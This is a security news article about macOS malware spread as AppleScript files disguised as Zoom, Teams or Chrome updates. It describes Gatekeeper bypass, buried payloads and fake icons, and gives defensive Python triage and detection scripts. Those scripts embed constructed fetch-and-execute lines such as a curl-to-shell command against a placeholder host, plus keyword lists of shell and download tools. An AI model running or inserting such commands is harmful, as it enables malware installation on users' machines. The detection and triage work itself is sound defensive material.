
AppleScript Abused to Spread Fake Zoom and Teams macOS Updates

Hackers use AppleScript to disguise macOS malware as fake app updates, bypassing Apple’s protections.

Written by Ken Underhill, Nov 12, 2025

Security researchers have uncovered a new attack vector leveraging AppleScript (.scpt) files to deliver malware disguised as legitimate software updates, including fake Zoom, Microsoft Teams, and Chrome installers. 

This method highlights a growing threat to macOS users as cybercriminals weaponize native scripting tools to evade Apple’s Gatekeeper security mechanisms.

From Right-Click Bypass to .SCPT: The Evolution of macOS Malware

In 2024, with macOS Sequoia, Apple removed a widely abused infection vector: the Control-click (right-click) and Open override that let a user launch an app Gatekeeper had blocked.

Since then, attackers have shifted toward using compiled AppleScript (.scpt) files as delivery vehicles for malware. 

These files open directly in Script Editor.app, a legitimate macOS application that provides a user-friendly interface for executing scripts.

When victims double-click these malicious files, they are presented with an interface that looks benign — often framed as part of an “update” or “installation” process. 

Social engineering prompts encourage users to click “Run” or press Command-R, unintentionally executing the embedded malicious code. 

Researchers found that the quarantine attribute does not stop this: a quarantined .scpt file still opens in Script Editor as a document, and pressing Run executes it with the user's privileges. Gatekeeper's notarization check applies to apps being launched, not to a script the user runs inside an app that is already trusted, so the built-in protection is effectively bypassed.

AppleScript Obfuscation: Hiding Payloads in Plain Sight

These AppleScript-based attacks rely on a layered blend of social engineering, platform behavior, and deliberate obfuscation to trick users into executing code that appears benign.

Attackers craft files with familiar update- or installer-style names (for example, variants that reference Teams, Zoom, or Chrome) and often embed convincing branding and custom file icons so the item looks like an ordinary updater or document when viewed in Finder.

Because macOS opens .scpt files in Script Editor by default, a double-click exposes a graphical interface with Run controls, which is what a user would expect to see.

To hide the malicious payload from cursory inspection, threat actors bury the active commands far down in the script text, separated by long runs of blank lines or nonfunctional comments. 

In compiled AppleScript samples the payload can be even harder to inspect because the file on disk is not plain text: Script Editor decompiles it for display, but string searches and many automated scanners see only bytecode, and a script saved as run-only keeps no source at all. 

When the user presses “Run” (or the keyboard shortcut), the visible update prompt is displayed while the script quietly performs background actions — for example, opening remote URLs, launching downloaders, or invoking system commands — without additional visible alerts.

The background activity is designed to feel legitimate: a plausible update dialog distracts the user while network requests retrieve follow-on payloads from attacker-controlled hosting. 

Those remote resources then deliver the actual malware payloads (stealers, RATs, or installers) which the script stages and executes. 

Because these actions are performed by a standard macOS app (Script Editor) and often by user-initiated interaction, they can circumvent Gatekeeper quarantine protections and evade simple signature-based detection.

Many of the .scpt samples register zero detections on scanning services, giving attackers a valuable window of operational freedom.

Delivery is straightforward and effective — phishing emails, malicious web pages posing as update notices, or compromised download sites distribute the .scpt files inside ZIPs or DMGs that preserve custom icons and resource forks, increasing the illusion of legitimacy.

Once executed, the chain can lead to persistence mechanisms, credential theft, and lateral movement — all while appearing to be nothing more than a routine update prompt to the victim.

Fake Icons and Names: The New macOS Deception

Beyond clever scripting, attackers use custom icons and naming conventions to disguise AppleScript files as common document formats. 

Samples have been identified with names like Stable1 Investment Proposal (Draft).pptx.scpt and AM Management Strategic Collaboration.docx.scpt, where the real extension is the last one and the document extension is part of the lure.

On macOS, these files display convincing Word or PowerPoint icons, making them nearly indistinguishable from legitimate documents.

Additionally, when bundled within .zip or .dmg (disk image) files, macOS preserves the embedded resource fork containing the fake icon, ensuring the deception persists once extracted or mounted. 

This tactic aligns with prior “drag-and-drop to Terminal” malware delivery techniques but with a lower barrier to execution — simply double-clicking the file is enough to trigger infection.
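The two deception layers described above, the buried payload and the document-style name plus custom icon, can be checked statically during triage. The following script is an added example and is not code from the article or from any vendor; the file names, the FinderInfo bytes and the script text are constructed for the demo. On a real sample you would obtain the script text with `osadecompile` and the attribute with `xattr -px com.apple.FinderInfo`; those two steps are assumed, not performed here.

```python
"""Static triage heuristics for suspicious AppleScript (.scpt) lures.

Checks three things: a document-style double extension (.docx.scpt),
the kHasCustomIcon flag in the com.apple.FinderInfo attribute, and an
active command (shell or network) buried behind a long run of blank or
comment-only lines. All sample data below is constructed.
"""
import re
import struct

DOC_EXTS = {".docx", ".doc", ".pptx", ".xlsx", ".pdf", ".pkg", ".dmg"}
SCRIPT_EXTS = {".scpt", ".scptd", ".applescript"}
# Finder flag bit (big-endian 16-bit word at offset 8 of FinderInfo) that tells
# Finder to draw the icon stored in the resource fork instead of the type icon.
K_HAS_CUSTOM_ICON = 0x0400
# AppleScript primitives that reach the shell or the network.
ACTIVE_RE = re.compile(r"\b(do shell script|open location|curl|osascript|nohup|base64)\b", re.I)

# Constructed FinderInfo: 32 bytes, only the custom-icon flag set.
SAMPLE_FINDER_INFO = b"\x00" * 8 + b"\x04\x00" + b"\x00" * 22

# Constructed lure: a benign-looking dialog, 120 blank lines, then the payload.
# The host name uses the reserved .invalid TLD and is not a real indicator.
LURE = "\n".join(
    ['display dialog "Microsoft Teams needs to update. Click Run to continue." buttons {"Run"}']
    + [""] * 120
    + ['do shell script "curl -fsSL http://updates.invalid/teams | sh"']
)


def has_deceptive_extension(name: str) -> bool:
    """True for names like 'Proposal.pptx.scpt' (document ext before script ext)."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    inner, outer = "." + parts[1], "." + parts[2]
    return outer in SCRIPT_EXTS and inner in DOC_EXTS


def has_custom_icon(finder_info: bytes) -> bool:
    """com.apple.FinderInfo layout: type(4) creator(4) flags(2) ... (32 bytes total)."""
    if len(finder_info) < 10:
        return False
    (flags,) = struct.unpack(">H", finder_info[8:10])
    return bool(flags & K_HAS_CUSTOM_ICON)


def find_buried_payload(source: str, min_gap: int = 50):
    """Return (line_number, gap, text) for the first active command that follows
    at least `min_gap` consecutive blank or comment-only lines, else None."""
    gap = 0
    for lineno, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("--") or stripped.startswith("#"):
            gap += 1
            continue
        if ACTIVE_RE.search(stripped) and gap >= min_gap:
            return lineno, gap, stripped
        gap = 0
    return None


def triage(name: str, finder_info: bytes, source: str) -> list:
    """Collect human-readable findings for one file."""
    findings = []
    if has_deceptive_extension(name):
        findings.append("document-style double extension")
    if has_custom_icon(finder_info):
        findings.append("custom Finder icon set (kHasCustomIcon)")
    hit = find_buried_payload(source)
    if hit:
        findings.append(f"active command at line {hit[0]} after {hit[1]} padding lines: {hit[2]}")
    return findings


if __name__ == "__main__":
    for f in triage("Zoom Update.pptx.scpt", SAMPLE_FINDER_INFO, LURE):
        print("-", f)
```

The padding threshold is deliberately crude; the point is that a script whose first shell or network call sits a hundred lines below the only visible dialog has no legitimate reason to be shaped that way, and that the name and icon checks need only file metadata, not execution.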

Building Resilience Against AppleScript-Based Attacks

As AppleScript is exploited to deliver disguised macOS malware, organizations must adopt a layered defense strategy that combines technical controls with user awareness.

  • Restrict AppleScript execution by changing the default handler for .scpt files (so a double-click opens a viewer, or nothing, rather than Script Editor), enforcing code-signing and notarization policies through MDM, and limiting Automation permissions in the Privacy & Security settings.
  • Implement endpoint detection and response (EDR) or extended detection and response (XDR) tools that monitor for unusual Script Editor or osascript activity and suspicious process chains.
  • Educate users about the risks of executing unfamiliar AppleScript files or fake updates, and reinforce awareness through ongoing phishing and social engineering training.
  • Verify all software updates through official or managed distribution channels, using code-signing validation to confirm installer authenticity before installation.
  • Apply application allowlisting, network filtering, and DNS security controls to block unverified scripts, malicious domains, and unauthorized network activity.
  • Establish clear incident response procedures, maintain secure offline and immutable backups, and use threat intelligence.
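The EDR point above comes down to one process chain that a genuine updater never produces: Script Editor or osascript spawning a shell, a downloader, or a freshly written binary. The following detection is an added example, not the article's or any vendor's code. The event format (JSON lines with pid, ppid, image and cmdline) is an assumption standing in for whatever an EDR or Endpoint Security client exports, and the events themselves are constructed, including a benign Terminal session that must not fire.

```python
"""Process-chain detection for AppleScript lures over constructed sample events.

Rule: alert when a shell, downloader, interpreter, or anything executing
from /tmp has Script Editor or osascript anywhere in its parent chain.
The JSON-lines event shape is an assumed EDR export format.
"""
import json

SCRIPT_HOSTS = {"Script Editor", "osascript"}
SUSPICIOUS_CHILDREN = {"sh", "bash", "zsh", "curl", "nohup", "python3", "chmod", "xattr", "open"}

# Constructed events: a lure run from Script Editor (pids 500-503) and a
# normal Terminal session using curl (pids 600-602). Host name is .invalid.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2025-11-12T09:00:01Z", "pid": 500, "ppid": 1,
     "image": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
     "cmdline": "Script Editor /Users/alice/Downloads/Teams Update.scpt"},
    {"ts": "2025-11-12T09:00:09Z", "pid": 501, "ppid": 500, "image": "/bin/sh",
     "cmdline": "sh -c curl -fsSL http://updates.invalid/t -o /tmp/t && chmod +x /tmp/t && /tmp/t"},
    {"ts": "2025-11-12T09:00:09Z", "pid": 502, "ppid": 501, "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL http://updates.invalid/t -o /tmp/t"},
    {"ts": "2025-11-12T09:00:11Z", "pid": 503, "ppid": 501, "image": "/tmp/t", "cmdline": "/tmp/t"},
    {"ts": "2025-11-12T09:05:00Z", "pid": 600, "ppid": 1,
     "image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "cmdline": "Terminal"},
    {"ts": "2025-11-12T09:05:01Z", "pid": 601, "ppid": 600, "image": "/bin/zsh", "cmdline": "-zsh"},
    {"ts": "2025-11-12T09:05:30Z", "pid": 602, "ppid": 601, "image": "/usr/bin/curl",
     "cmdline": "curl https://example.com"},
])


def parse_events(text: str) -> list:
    """Parse JSON lines into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def image_name(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def ancestry(pid: int, by_pid: dict) -> list:
    """Image names from the given pid outward to the root, cycle-safe."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(image_name(ev["image"]))
        pid = ev["ppid"]
    return chain


def detect(events: list) -> list:
    """Return one alert per process whose parent chain contains a script host
    and whose own image is a shell/downloader/interpreter or lives in /tmp."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = image_name(e["image"])
        parents = ancestry(e["ppid"], by_pid)
        host = next((p for p in parents if p in SCRIPT_HOSTS), None)
        if host and (name in SUSPICIOUS_CHILDREN or e["image"].startswith("/tmp/")):
            alerts.append({
                "pid": e["pid"],
                "image": name,
                "via": host,
                "chain": " -> ".join(list(reversed(parents)) + [name]),
                "cmdline": e["cmdline"],
            })
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_EVENTS)):
        print(f"[ALERT] pid={a['pid']} {a['chain']} :: {a['cmdline']}")
```

Walking the full ancestry rather than only the immediate parent matters because the interesting children (curl, the dropped binary) are usually grandchildren of Script Editor via `do shell script`'s `/bin/sh`; the Terminal session shows the same curl image with a different ancestry and stays quiet.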

By combining system hardening, continuous monitoring, and informed user behavior, organizations can reduce the likelihood of successful AppleScript-based compromises and build cyber resilience. 

The New macOS Threat Trend

The rise of AppleScript-based malware delivery reflects a broader shift in macOS attack strategies — from exploiting vulnerabilities to abusing legitimate system features. 

As attackers increasingly blend social engineering with trusted automation tools, traditional defenses alone are no longer sufficient. 

This growing abuse of legitimate macOS features underscores why adopting a zero-trust approach — where every action, user, and process must be verified — has become essential.
